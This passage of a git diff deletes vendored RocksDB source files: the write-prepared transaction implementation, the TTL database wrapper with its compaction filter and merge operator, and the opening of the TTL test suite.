-                         SequenceNumber earliest_seq, SequenceNumber key_seq,
-                         const std::string& key, bool cache_only);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.cc b/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.cc
deleted file mode 100644
index 211e217..0000000
--- a/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.cc
+++ /dev/null
@@ -1,88 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/write_prepared_txn.h"
-
-#include <map>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-
-namespace rocksdb {
-
-struct WriteOptions;
-
-WritePreparedTxn::WritePreparedTxn(WritePreparedTxnDB* txn_db,
-                                   const WriteOptions& write_options,
-                                   const TransactionOptions& txn_options)
-    : PessimisticTransaction(txn_db, write_options, txn_options),
-      wpt_db_(txn_db) {
-  PessimisticTransaction::Initialize(txn_options);
-}
-
-Status WritePreparedTxn::CommitBatch(WriteBatch* /* unused */) {
-  // TODO(myabandeh) Implement this
-  throw std::runtime_error("CommitBatch not Implemented");
-  return Status::OK();
-}
-
-Status WritePreparedTxn::PrepareInternal() {
-  WriteOptions write_options = write_options_;
-  write_options.disableWAL = false;
-  WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_);
-  const bool disable_memtable = true;
-  uint64_t seq_used;
-  Status s =
-      db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(),
-                          /*callback*/ nullptr, &log_number_, /*log ref*/ 0,
-                          !disable_memtable, &seq_used);
-  prepare_seq_ = seq_used;
-  wpt_db_->AddPrepared(prepare_seq_);
-  return s;
-}
-
-Status WritePreparedTxn::CommitWithoutPrepareInternal() {
-  // TODO(myabandeh) Implement this
-  throw std::runtime_error("Commit not Implemented");
-  return Status::OK();
-}
-
-Status WritePreparedTxn::CommitInternal() {
-  // We take the commit-time batch and append the Commit marker.
-  // The Memtable will ignore the Commit marker in non-recovery mode
-  WriteBatch* working_batch = GetCommitTimeWriteBatch();
-  // TODO(myabandeh): prevent the users from writing to txn after the prepare
-  // phase
-  assert(working_batch->Count() == 0);
-  WriteBatchInternal::MarkCommit(working_batch, name_);
-
-  // any operations appended to this working_batch will be ignored from WAL
-  working_batch->MarkWalTerminationPoint();
-
-  const bool disable_memtable = true;
-  uint64_t seq_used;
-  auto s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr,
-                               log_number_, disable_memtable, &seq_used);
-  uint64_t& commit_seq = seq_used;
-  wpt_db_->AddCommitted(prepare_seq_, commit_seq);
-  return s;
-}
-
-Status WritePreparedTxn::Rollback() {
-  // TODO(myabandeh) Implement this
-  throw std::runtime_error("Rollback not Implemented");
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.h b/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.h
deleted file mode 100644
index b7cc6ba..0000000
--- a/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.h
+++ /dev/null
@@ -1,76 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <atomic>
-#include <mutex>
-#include <stack>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "db/write_callback.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/autovector.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-#include "utilities/transactions/transaction_base.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-class WritePreparedTxnDB;
-
-// This impl could write to DB also uncomitted data and then later tell apart
-// committed data from uncomitted data. Uncommitted data could be after the
-// Prepare phase in 2PC (WritePreparedTxn) or before that
-// (WriteUnpreparedTxnImpl).
-class WritePreparedTxn : public PessimisticTransaction {
- public:
-  WritePreparedTxn(WritePreparedTxnDB* db, const WriteOptions& write_options,
-                   const TransactionOptions& txn_options);
-
-  virtual ~WritePreparedTxn() {}
-
-  Status CommitBatch(WriteBatch* batch) override;
-
-  Status Rollback() override;
-
- private:
-  Status PrepareInternal() override;
-
-  Status CommitWithoutPrepareInternal() override;
-
-  Status CommitInternal() override;
-
-  // TODO(myabandeh): verify that the current impl work with values being
-  // written with prepare sequence number too.
-  // Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice&
-  // key,
-  //                        SequenceNumber prev_seqno, SequenceNumber*
-  //                        new_seqno);
-
-  // No copying allowed
-  WritePreparedTxn(const WritePreparedTxn&);
-  void operator=(const WritePreparedTxn&);
-
-  WritePreparedTxnDB* wpt_db_;
-  uint64_t prepare_seq_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.cc b/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.cc
deleted file mode 100644
index de3f299..0000000
--- a/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#ifndef ROCKSDB_LITE
-
-#include "utilities/ttl/db_ttl_impl.h"
-
-#include "db/write_batch_internal.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "util/coding.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-void DBWithTTLImpl::SanitizeOptions(int32_t ttl, ColumnFamilyOptions* options,
-                                    Env* env) {
-  if (options->compaction_filter) {
-    options->compaction_filter =
-        new TtlCompactionFilter(ttl, env, options->compaction_filter);
-  } else {
-    options->compaction_filter_factory =
-        std::shared_ptr<CompactionFilterFactory>(new TtlCompactionFilterFactory(
-            ttl, env, options->compaction_filter_factory));
-  }
-
-  if (options->merge_operator) {
-    options->merge_operator.reset(
-        new TtlMergeOperator(options->merge_operator, env));
-  }
-}
-
-// Open the db inside DBWithTTLImpl because options needs pointer to its ttl
-DBWithTTLImpl::DBWithTTLImpl(DB* db) : DBWithTTL(db) {}
-
-DBWithTTLImpl::~DBWithTTLImpl() {
-  // Need to stop background compaction before getting rid of the filter
-  CancelAllBackgroundWork(db_, /* wait = */ true);
-  delete GetOptions().compaction_filter;
-}
-
-Status UtilityDB::OpenTtlDB(const Options& options, const std::string& dbname,
-                            StackableDB** dbptr, int32_t ttl, bool read_only) {
-  DBWithTTL* db;
-  Status s = DBWithTTL::Open(options, dbname, &db, ttl, read_only);
-  if (s.ok()) {
-    *dbptr = db;
-  } else {
-    *dbptr = nullptr;
-  }
-  return s;
-}
-
-Status DBWithTTL::Open(const Options& options, const std::string& dbname,
-                       DBWithTTL** dbptr, int32_t ttl, bool read_only) {
-
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = DBWithTTL::Open(db_options, dbname, column_families, &handles,
-                             dbptr, {ttl}, read_only);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-  return s;
-}
-
-Status DBWithTTL::Open(
-    const DBOptions& db_options, const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles, DBWithTTL** dbptr,
-    std::vector<int32_t> ttls, bool read_only) {
-
-  if (ttls.size() != column_families.size()) {
-    return Status::InvalidArgument(
-        "ttls size has to be the same as number of column families");
-  }
-
-  std::vector<ColumnFamilyDescriptor> column_families_sanitized =
-      column_families;
-  for (size_t i = 0; i < column_families_sanitized.size(); ++i) {
-    DBWithTTLImpl::SanitizeOptions(
-        ttls[i], &column_families_sanitized[i].options,
-        db_options.env == nullptr ? Env::Default() : db_options.env);
-  }
-  DB* db;
-
-  Status st;
-  if (read_only) {
-    st = DB::OpenForReadOnly(db_options, dbname, column_families_sanitized,
-                             handles, &db);
-  } else {
-    st = DB::Open(db_options, dbname, column_families_sanitized, handles, &db);
-  }
-  if (st.ok()) {
-    *dbptr = new DBWithTTLImpl(db);
-  } else {
-    *dbptr = nullptr;
-  }
-  return st;
-}
-
-Status DBWithTTLImpl::CreateColumnFamilyWithTtl(
-    const ColumnFamilyOptions& options, const std::string& column_family_name,
-    ColumnFamilyHandle** handle, int ttl) {
-  ColumnFamilyOptions sanitized_options = options;
-  DBWithTTLImpl::SanitizeOptions(ttl, &sanitized_options, GetEnv());
-
-  return DBWithTTL::CreateColumnFamily(sanitized_options, column_family_name,
-                                       handle);
-}
-
-Status DBWithTTLImpl::CreateColumnFamily(const ColumnFamilyOptions& options,
-                                         const std::string& column_family_name,
-                                         ColumnFamilyHandle** handle) {
-  return CreateColumnFamilyWithTtl(options, column_family_name, handle, 0);
-}
-
-// Appends the current timestamp to the string.
-// Returns false if could not get the current_time, true if append succeeds
-Status DBWithTTLImpl::AppendTS(const Slice& val, std::string* val_with_ts,
-                               Env* env) {
-  val_with_ts->reserve(kTSLength + val.size());
-  char ts_string[kTSLength];
-  int64_t curtime;
-  Status st = env->GetCurrentTime(&curtime);
-  if (!st.ok()) {
-    return st;
-  }
-  EncodeFixed32(ts_string, (int32_t)curtime);
-  val_with_ts->append(val.data(), val.size());
-  val_with_ts->append(ts_string, kTSLength);
-  return st;
-}
-
-// Returns corruption if the length of the string is lesser than timestamp, or
-// timestamp refers to a time lesser than ttl-feature release time
-Status DBWithTTLImpl::SanityCheckTimestamp(const Slice& str) {
-  if (str.size() < kTSLength) {
-    return Status::Corruption("Error: value's length less than timestamp's\n");
-  }
-  // Checks that TS is not lesser than kMinTimestamp
-  // Gaurds against corruption & normal database opened incorrectly in ttl mode
-  int32_t timestamp_value = DecodeFixed32(str.data() + str.size() - kTSLength);
-  if (timestamp_value < kMinTimestamp) {
-    return Status::Corruption("Error: Timestamp < ttl feature release time!\n");
-  }
-  return Status::OK();
-}
-
-// Checks if the string is stale or not according to TTl provided
-bool DBWithTTLImpl::IsStale(const Slice& value, int32_t ttl, Env* env) {
-  if (ttl <= 0) {  // Data is fresh if TTL is non-positive
-    return false;
-  }
-  int64_t curtime;
-  if (!env->GetCurrentTime(&curtime).ok()) {
-    return false;  // Treat the data as fresh if could not get current time
-  }
-  int32_t timestamp_value =
-      DecodeFixed32(value.data() + value.size() - kTSLength);
-  return (timestamp_value + ttl) < curtime;
-}
-
-// Strips the TS from the end of the slice
-Status DBWithTTLImpl::StripTS(PinnableSlice* pinnable_val) {
-  Status st;
-  if (pinnable_val->size() < kTSLength) {
-    return Status::Corruption("Bad timestamp in key-value");
-  }
-  // Erasing characters which hold the TS
-  pinnable_val->remove_suffix(kTSLength);
-  return st;
-}
-
-// Strips the TS from the end of the string
-Status DBWithTTLImpl::StripTS(std::string* str) {
-  Status st;
-  if (str->length() < kTSLength) {
-    return Status::Corruption("Bad timestamp in key-value");
-  }
-  // Erasing characters which hold the TS
-  str->erase(str->length() - kTSLength, kTSLength);
-  return st;
-}
-
-Status DBWithTTLImpl::Put(const WriteOptions& options,
-                          ColumnFamilyHandle* column_family, const Slice& key,
-                          const Slice& val) {
-  WriteBatch batch;
-  batch.Put(column_family, key, val);
-  return Write(options, &batch);
-}
-
-Status DBWithTTLImpl::Get(const ReadOptions& options,
-                          ColumnFamilyHandle* column_family, const Slice& key,
-                          PinnableSlice* value) {
-  Status st = db_->Get(options, column_family, key, value);
-  if (!st.ok()) {
-    return st;
-  }
-  st = SanityCheckTimestamp(*value);
-  if (!st.ok()) {
-    return st;
-  }
-  return StripTS(value);
-}
-
-std::vector<Status> DBWithTTLImpl::MultiGet(
-    const ReadOptions& options,
-    const std::vector<ColumnFamilyHandle*>& column_family,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  auto statuses = db_->MultiGet(options, column_family, keys, values);
-  for (size_t i = 0; i < keys.size(); ++i) {
-    if (!statuses[i].ok()) {
-      continue;
-    }
-    statuses[i] = SanityCheckTimestamp((*values)[i]);
-    if (!statuses[i].ok()) {
-      continue;
-    }
-    statuses[i] = StripTS(&(*values)[i]);
-  }
-  return statuses;
-}
-
-bool DBWithTTLImpl::KeyMayExist(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family,
-                                const Slice& key, std::string* value,
-                                bool* value_found) {
-  bool ret = db_->KeyMayExist(options, column_family, key, value, value_found);
-  if (ret && value != nullptr && value_found != nullptr && *value_found) {
-    if (!SanityCheckTimestamp(*value).ok() || !StripTS(value).ok()) {
-      return false;
-    }
-  }
-  return ret;
-}
-
-Status DBWithTTLImpl::Merge(const WriteOptions& options,
-                            ColumnFamilyHandle* column_family, const Slice& key,
-                            const Slice& value) {
-  WriteBatch batch;
-  batch.Merge(column_family, key, value);
-  return Write(options, &batch);
-}
-
-Status DBWithTTLImpl::Write(const WriteOptions& opts, WriteBatch* updates) {
-  class Handler : public WriteBatch::Handler {
-   public:
-    explicit Handler(Env* env) : env_(env) {}
-    WriteBatch updates_ttl;
-    Status batch_rewrite_status;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      std::string value_with_ts;
-      Status st = AppendTS(value, &value_with_ts, env_);
-      if (!st.ok()) {
-        batch_rewrite_status = st;
-      } else {
-        WriteBatchInternal::Put(&updates_ttl, column_family_id, key,
-                                value_with_ts);
-      }
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      std::string value_with_ts;
-      Status st = AppendTS(value, &value_with_ts, env_);
-      if (!st.ok()) {
-        batch_rewrite_status = st;
-      } else {
-        WriteBatchInternal::Merge(&updates_ttl, column_family_id, key,
-                                  value_with_ts);
-      }
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      WriteBatchInternal::Delete(&updates_ttl, column_family_id, key);
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override {
-      updates_ttl.PutLogData(blob);
-    }
-
-   private:
-    Env* env_;
-  };
-  Handler handler(GetEnv());
-  updates->Iterate(&handler);
-  if (!handler.batch_rewrite_status.ok()) {
-    return handler.batch_rewrite_status;
-  } else {
-    return db_->Write(opts, &(handler.updates_ttl));
-  }
-}
-
-Iterator* DBWithTTLImpl::NewIterator(const ReadOptions& opts,
-                                     ColumnFamilyHandle* column_family) {
-  return new TtlIterator(db_->NewIterator(opts, column_family));
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.h b/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.h
deleted file mode 100644
index ab2b8cd..0000000
--- a/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.h
+++ /dev/null
@@ -1,347 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include <deque>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/utilities/utility_db.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "db/db_impl.h"
-
-#ifdef _WIN32
-// Windows API macro interference
-#undef GetCurrentTime
-#endif
-
-
-namespace rocksdb {
-
-class DBWithTTLImpl : public DBWithTTL {
- public:
-  static void SanitizeOptions(int32_t ttl, ColumnFamilyOptions* options,
-                              Env* env);
-
-  explicit DBWithTTLImpl(DB* db);
-
-  virtual ~DBWithTTLImpl();
-
-  Status CreateColumnFamilyWithTtl(const ColumnFamilyOptions& options,
-                                   const std::string& column_family_name,
-                                   ColumnFamilyHandle** handle,
-                                   int ttl) override;
-
-  Status CreateColumnFamily(const ColumnFamilyOptions& options,
-                            const std::string& column_family_name,
-                            ColumnFamilyHandle** handle) override;
-
-  using StackableDB::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& val) override;
-
-  using StackableDB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override;
-
-  using StackableDB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  using StackableDB::KeyMayExist;
-  virtual bool KeyMayExist(const ReadOptions& options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value,
-                           bool* value_found = nullptr) override;
-
-  using StackableDB::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override;
-
-  virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override;
-
-  using StackableDB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& opts,
-                                ColumnFamilyHandle* column_family) override;
-
-  virtual DB* GetBaseDB() override { return db_; }
-
-  static bool IsStale(const Slice& value, int32_t ttl, Env* env);
-
-  static Status AppendTS(const Slice& val, std::string* val_with_ts, Env* env);
-
-  static Status SanityCheckTimestamp(const Slice& str);
-
-  static Status StripTS(std::string* str);
-
-  static Status StripTS(PinnableSlice* str);
-
-  static const uint32_t kTSLength = sizeof(int32_t);  // size of timestamp
-
-  static const int32_t kMinTimestamp = 1368146402;  // 05/09/2013:5:40PM GMT-8
-
-  static const int32_t kMaxTimestamp = 2147483647;  // 01/18/2038:7:14PM GMT-8
-};
-
-class TtlIterator : public Iterator {
-
- public:
-  explicit TtlIterator(Iterator* iter) : iter_(iter) { assert(iter_); }
-
-  ~TtlIterator() { delete iter_; }
-
-  bool Valid() const override { return iter_->Valid(); }
-
-  void SeekToFirst() override { iter_->SeekToFirst(); }
-
-  void SeekToLast() override { iter_->SeekToLast(); }
-
-  void Seek(const Slice& target) override { iter_->Seek(target); }
-
-  void SeekForPrev(const Slice& target) override { iter_->SeekForPrev(target); }
-
-  void Next() override { iter_->Next(); }
-
-  void Prev() override { iter_->Prev(); }
-
-  Slice key() const override { return iter_->key(); }
-
-  int32_t timestamp() const {
-    return DecodeFixed32(iter_->value().data() + iter_->value().size() -
-                         DBWithTTLImpl::kTSLength);
-  }
-
-  Slice value() const override {
-    // TODO: handle timestamp corruption like in general iterator semantics
-    assert(DBWithTTLImpl::SanityCheckTimestamp(iter_->value()).ok());
-    Slice trimmed_value = iter_->value();
-    trimmed_value.size_ -= DBWithTTLImpl::kTSLength;
-    return trimmed_value;
-  }
-
-  Status status() const override { return iter_->status(); }
-
- private:
-  Iterator* iter_;
-};
-
-class TtlCompactionFilter : public CompactionFilter {
- public:
-  TtlCompactionFilter(
-      int32_t ttl, Env* env, const CompactionFilter* user_comp_filter,
-      std::unique_ptr<const CompactionFilter> user_comp_filter_from_factory =
-          nullptr)
-      : ttl_(ttl),
-        env_(env),
-        user_comp_filter_(user_comp_filter),
-        user_comp_filter_from_factory_(
-            std::move(user_comp_filter_from_factory)) {
-    // Unlike the merge operator, compaction filter is necessary for TTL, hence
-    // this would be called even if user doesn't specify any compaction-filter
-    if (!user_comp_filter_) {
-      user_comp_filter_ = user_comp_filter_from_factory_.get();
-    }
-  }
-
-  virtual bool Filter(int level, const Slice& key, const Slice& old_val,
-                      std::string* new_val, bool* value_changed) const
-      override {
-    if (DBWithTTLImpl::IsStale(old_val, ttl_, env_)) {
-      return true;
-    }
-    if (user_comp_filter_ == nullptr) {
-      return false;
-    }
-    assert(old_val.size() >= DBWithTTLImpl::kTSLength);
-    Slice old_val_without_ts(old_val.data(),
-                             old_val.size() - DBWithTTLImpl::kTSLength);
-    if (user_comp_filter_->Filter(level, key, old_val_without_ts, new_val,
-                                  value_changed)) {
-      return true;
-    }
-    if (*value_changed) {
-      new_val->append(
-          old_val.data() + old_val.size() - DBWithTTLImpl::kTSLength,
-          DBWithTTLImpl::kTSLength);
-    }
-    return false;
-  }
-
-  virtual const char* Name() const override { return "Delete By TTL"; }
-
- private:
-  int32_t ttl_;
-  Env* env_;
-  const CompactionFilter* user_comp_filter_;
-  std::unique_ptr<const CompactionFilter> user_comp_filter_from_factory_;
-};
-
-class TtlCompactionFilterFactory : public CompactionFilterFactory {
- public:
-  TtlCompactionFilterFactory(
-      int32_t ttl, Env* env,
-      std::shared_ptr<CompactionFilterFactory> comp_filter_factory)
-      : ttl_(ttl), env_(env), user_comp_filter_factory_(comp_filter_factory) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    std::unique_ptr<const CompactionFilter> user_comp_filter_from_factory =
-        nullptr;
-    if (user_comp_filter_factory_) {
-      user_comp_filter_from_factory =
-          user_comp_filter_factory_->CreateCompactionFilter(context);
-    }
-
-    return std::unique_ptr<TtlCompactionFilter>(new TtlCompactionFilter(
-        ttl_, env_, nullptr, std::move(user_comp_filter_from_factory)));
-  }
-
-  virtual const char* Name() const override {
-    return "TtlCompactionFilterFactory";
-  }
-
- private:
-  int32_t ttl_;
-  Env* env_;
-  std::shared_ptr<CompactionFilterFactory> user_comp_filter_factory_;
-};
-
-class TtlMergeOperator : public MergeOperator {
-
- public:
-  explicit TtlMergeOperator(const std::shared_ptr<MergeOperator>& merge_op,
-                            Env* env)
-      : user_merge_op_(merge_op), env_(env) {
-    assert(merge_op);
-    assert(env);
-  }
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    const uint32_t ts_len = DBWithTTLImpl::kTSLength;
-    if (merge_in.existing_value && merge_in.existing_value->size() < ts_len) {
-      ROCKS_LOG_ERROR(merge_in.logger,
-                      "Error: Could not remove timestamp from existing value.");
-      return false;
-    }
-
-    // Extract time-stamp from each operand to be passed to user_merge_op_
-    std::vector<Slice> operands_without_ts;
-    for (const auto& operand : merge_in.operand_list) {
-      if (operand.size() < ts_len) {
-        ROCKS_LOG_ERROR(
-            merge_in.logger,
-            "Error: Could not remove timestamp from operand value.");
-        return false;
-      }
-      operands_without_ts.push_back(operand);
-      operands_without_ts.back().remove_suffix(ts_len);
-    }
-
-    // Apply the user merge operator (store result in *new_value)
-    bool good = true;
-    MergeOperationOutput user_merge_out(merge_out->new_value,
-                                        merge_out->existing_operand);
-    if (merge_in.existing_value) {
-      Slice existing_value_without_ts(merge_in.existing_value->data(),
-                                      merge_in.existing_value->size() - ts_len);
-      good = user_merge_op_->FullMergeV2(
-          MergeOperationInput(merge_in.key, &existing_value_without_ts,
-                              operands_without_ts, merge_in.logger),
-          &user_merge_out);
-    } else {
-      good = user_merge_op_->FullMergeV2(
-          MergeOperationInput(merge_in.key, nullptr, operands_without_ts,
-                              merge_in.logger),
-          &user_merge_out);
-    }
-
-    // Return false if the user merge operator returned false
-    if (!good) {
-      return false;
-    }
-
-    if (merge_out->existing_operand.data()) {
-      merge_out->new_value.assign(merge_out->existing_operand.data(),
-                                  merge_out->existing_operand.size());
-      merge_out->existing_operand = Slice(nullptr, 0);
-    }
-
-    // Augment the *new_value with the ttl time-stamp
-    int64_t curtime;
-    if (!env_->GetCurrentTime(&curtime).ok()) {
-      ROCKS_LOG_ERROR(
-          merge_in.logger,
-          "Error: Could not get current time to be attached internally "
-          "to the new value.");
-      return false;
-    } else {
-      char ts_string[ts_len];
-      EncodeFixed32(ts_string, (int32_t)curtime);
-      merge_out->new_value.append(ts_string, ts_len);
-      return true;
-    }
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value, Logger* logger) const
-      override {
-    const uint32_t ts_len = DBWithTTLImpl::kTSLength;
-    std::deque<Slice> operands_without_ts;
-
-    for (const auto& operand : operand_list) {
-      if (operand.size() < ts_len) {
-        ROCKS_LOG_ERROR(logger,
-                        "Error: Could not remove timestamp from value.");
-        return false;
-      }
-
-      operands_without_ts.push_back(
-          Slice(operand.data(), operand.size() - ts_len));
-    }
-
-    // Apply the user partial-merge operator (store result in *new_value)
-    assert(new_value);
-    if (!user_merge_op_->PartialMergeMulti(key, operands_without_ts, new_value,
-                                           logger)) {
-      return false;
-    }
-
-    // Augment the *new_value with the ttl time-stamp
-    int64_t curtime;
-    if (!env_->GetCurrentTime(&curtime).ok()) {
-      ROCKS_LOG_ERROR(
-          logger,
-          "Error: Could not get current time to be attached internally "
-          "to the new value.");
-      return false;
-    } else {
-      char ts_string[ts_len];
-      EncodeFixed32(ts_string, (int32_t)curtime);
-      new_value->append(ts_string, ts_len);
-      return true;
-    }
-  }
-
-  virtual const char* Name() const override { return "Merge By TTL"; }
-
- private:
-  std::shared_ptr<MergeOperator> user_merge_op_;
-  Env* env_;
-};
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/ttl/ttl_test.cc b/thirdparty/rocksdb/utilities/ttl/ttl_test.cc
deleted file mode 100644
index 586d0ce..0000000
--- a/thirdparty/rocksdb/utilities/ttl/ttl_test.cc
+++ /dev/null
@@ -1,645 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <memory>
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-
-namespace rocksdb {
-
-namespace {
-
-typedef std::map<std::string, std::string> KVMap;
-
-enum BatchOperation { OP_PUT = 0, OP_DELETE = 1 };
-}
-
-class SpecialTimeEnv : public EnvWrapper {
- public:
-  explicit SpecialTimeEnv(Env* base) : EnvWrapper(base) {
-    base->GetCurrentTime(&current_time_);
-  }
-
-  void Sleep(int64_t sleep_time) { current_time_ += sleep_time; }
-  virtual Status GetCurrentTime(int64_t* current_time) override {
-    *current_time = current_time_;
-    return Status::OK();
-  }
-
- private:
-  int64_t current_time_ = 0;
-};
-
-class TtlTest : public testing::Test {
- public:
-  TtlTest() {
-    env_.reset(new SpecialTimeEnv(Env::Default()));
-    dbname_ = test::TmpDir() + "/db_ttl";
-    options_.create_if_missing = true;
-    options_.env = env_.get();
-    // ensure that compaction is kicked in to always strip timestamp from kvs
-    options_.max_compaction_bytes = 1;
-    // compaction should take place always from level0 for determinism
-    db_ttl_ = nullptr;
-    DestroyDB(dbname_, Options());
-  }
-
-  ~TtlTest() {
-    CloseTtl();
-    DestroyDB(dbname_, Options());
-  }
-
-  // Open database with TTL support when TTL not provided with db_ttl_ pointer
-  void OpenTtl() {
-    ASSERT_TRUE(db_ttl_ ==
-                nullptr);  //  db should be closed before opening again
-    ASSERT_OK(DBWithTTL::Open(options_, dbname_, &db_ttl_));
-  }
-
-  // Open database with TTL support when TTL provided with db_ttl_ pointer
-  void OpenTtl(int32_t ttl) {
-    ASSERT_TRUE(db_ttl_ == nullptr);
-    ASSERT_OK(DBWithTTL::Open(options_, dbname_, &db_ttl_, ttl));
-  }
-
-  // Open with TestFilter compaction filter
-  void OpenTtlWithTestCompaction(int32_t ttl) {
-    options_.compaction_filter_factory =
-      std::shared_ptr<CompactionFilterFactory>(
-          new TestFilterFactory(kSampleSize_, kNewValue_));
-    OpenTtl(ttl);
-  }
-
-  // Open database with TTL support in read_only mode
-  void OpenReadOnlyTtl(int32_t ttl) {
-    ASSERT_TRUE(db_ttl_ == nullptr);
-    ASSERT_OK(DBWithTTL::Open(options_, dbname_, &db_ttl_, ttl, true));
-  }
-
-  void CloseTtl() {
-    delete db_ttl_;
-    db_ttl_ = nullptr;
-  }
-
-  // Populates and returns a kv-map
-  void MakeKVMap(int64_t num_entries) {
-    kvmap_.clear();
-    int digits = 1;
-    for (int64_t dummy = num_entries; dummy /= 10; ++digits) {
-    }
-    int digits_in_i = 1;
-    for (int64_t i = 0; i < num_entries; i++) {
-      std::string key = "key";
-      std::string value = "value";
-      if (i % 10 == 0) {
-        digits_in_i++;
-      }
-      for(int j = digits_in_i; j < digits; j++) {
-        key.append("0");
-        value.append("0");
-      }
-      AppendNumberTo(&key, i);
-      AppendNumberTo(&value, i);
-      kvmap_[key] = value;
-    }
-    ASSERT_EQ(static_cast<int64_t>(kvmap_.size()),
-              num_entries);  // check all insertions done
-  }
-
